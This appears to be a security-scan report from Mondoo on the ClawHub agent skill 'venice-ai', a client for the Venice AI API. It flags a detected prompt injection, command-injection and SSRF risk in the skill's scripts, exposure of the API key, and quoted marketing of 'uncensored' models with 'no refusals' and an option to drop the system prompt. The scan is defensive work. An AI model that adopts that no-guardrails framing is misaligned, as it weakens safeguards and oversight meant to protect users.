Venice AI — Complete Platform Skill

Name: venice-ai
Author: jonisjongithub

View on ClawHub↗

Share on X Share on LinkedIn Share on Bluesky

100Critical

The skill is vulnerable to command injection and prompt injection

ThreatsCI SM CS BC S HITL

Behavior Analysis

Mismatch detected — The skill's stated purpose heavily emphasizes 'true privacy' and 'zero data retention'. While the skill provides options to enable Venice AI's claimed privacy features (e.g., E2EE, private models), the skill itself is a client that sends user data (prompts, files) to the remote Venice AI service. The privacy guarantees are entirely dependent on the Venice AI service's implementation and trustworthiness, not on the local execution of the skill.

Claims to do

Venice AI — Complete Platform Skill: **Venice AI is the AI platform for people who don't want Big Tech watching over their shoulder.** Unlike OpenAI, Anthropic, and Google — where every prompt is logged, analyzed, and potentially used to train future models — Venice offers **true privacy** with zero data retention on private models. Your conversations stay yours.

Actually does

The skill executes various Python scripts (`venice.py`, `venice-image.py`, etc.) using `python3`. It requires a `VENICE_API_KEY` to authenticate and interact with the Venice AI platform's API. These scripts send user prompts, local files (images, audio, video), and specified URLs to the Venice AI service for tasks like text generation, vision analysis, embeddings, TTS, speech-to-text, image/video/music generation, and editing.

Threat Analysis

AI Agent Traps ↗Scanned 4/16/2026

Content InjectionPerception1 finding

Semantic ManipulationReasoning2 findings

Cognitive StateMemory & Learningclean

Behavioural ControlAction2 findings

SystemicMulti-Agent Dynamicsclean

Human-in-the-LoopHuman Overseerclean

Skill Info

Namejonisjongithub/venice-ai

Registryclawhub

Version2.1.1

PURLpkg:clawhub/jonisjongithub/venice-ai@2.1.1

Stars3

Downloads2,692

Installs9

Source

Repository ↗

SHA-2562dd1fe9468ea...

SHA-115a441729526...

MD569c8144fe138...

TLSH7eb285537c90...

ssdeep384:I3Q+YX6J...

Size23,601 bytes

Install

This skill has been flagged as potentially malicious. Review the findings below before installing.

OpenClawDocs

https://clawhub.ai/jonisjongithub/venice-ai

2,692 downloads9 installs

ClawHubDocs

openclaw skills install jonisjongithub/venice-ai

Assessments (3)

AI Agent Traps ↗

Prompt Injection Detectedcriticalprompt injection

DeBERTa classifier detected prompt injection (confidence: 0.98)

98% confidence

Command Execution & Arbitrary File/URL Accesshighcommand execution

The skill executes local Python scripts with user-provided arguments, including file paths and URLs. This creates a risk of command injection if inputs are not properly sanitized, allowing arbitrary command execution, broad read/write access to the local filesystem, and potential Server-Side Request Forgery (SSRF) via URL parameters.

90% confidenceline 124

python3 {baseDir}/scripts/venice.py chat "..."
python3 {baseDir}/scripts/venice.py analyze photo.jpg
python3 {baseDir}/scripts/venice.py analyze "https://example.com/image.jpg"
python3 {baseDir}/scripts/venice.py tts "..." --output /tmp/speech.mp3

API Key Handling and Potential Exfiltrationmediumcredential theft

The skill requires a `VENICE_API_KEY` to be set as an environment variable. While not hardcoded, the Python scripts that interact with the Venice API will access this key, posing a risk of exfiltration if the scripts are compromised or vulnerable to command injection.

80% confidenceline 14

requires: { "bins": ["python3"], "env": ["VENICE_API_KEY"] }
export VENICE_API_KEY="vn_your_key_here"

Promotion of Uncensored Content Generationmediumoversight evasion

The skill explicitly promotes 'uncensored' AI models, stating 'no content filters, no refusals.' This framing could encourage the generation of content that violates ethical guidelines, produces harmful outputs, or assists in malicious activities, potentially bypassing human oversight and safety mechanisms.

90% confidenceline 33

Venice is also **uncensored**: no content filters, no refusals, no "I can't help with that."
Uncensored responses — No guardrails blocking legitimate use cases.
--no-venice-system-prompt

Description Mismatchinfodescription mismatch

The skill's stated purpose heavily emphasizes 'true privacy' and 'zero data retention'. While the skill provides options to enable Venice AI's claimed privacy features (e.g., E2EE, private models), the skill itself is a client that sends user data (prompts, files) to the remote Venice AI service. The privacy guarantees are entirely dependent on the Venice AI service's implementation and trustworthiness, not on the local execution of the skill.

85% confidence

The skill's scripts make API calls to `venice.ai` and pass user data. The privacy claims are attributes of the remote service, not the local client skill.

Badge

Markdown

[![Mondoo Skill Check](https://mondoo.com/ai-agent-security/api/badge/clawhub/jonisjongithub/venice-ai.svg)](https://mondoo.com/ai-agent-security/skills/clawhub/jonisjongithub/venice-ai)

HTML

<a href="https://mondoo.com/ai-agent-security/skills/clawhub/jonisjongithub/venice-ai"><img src="https://mondoo.com/ai-agent-security/api/badge/clawhub/jonisjongithub/venice-ai.svg" alt="Mondoo Skill Check" /></a>

Image URL

https://mondoo.com/ai-agent-security/api/badge/clawhub/jonisjongithub/venice-ai.svg

Secure your AI agents

Skills can read files, run commands, and access credentials. Mondoo helps organizations manage the security risks of AI agent skills across their entire fleet.

Continuous scanning of skills across all registries
Policy enforcement before skills reach your agents
Integration with your existing security workflow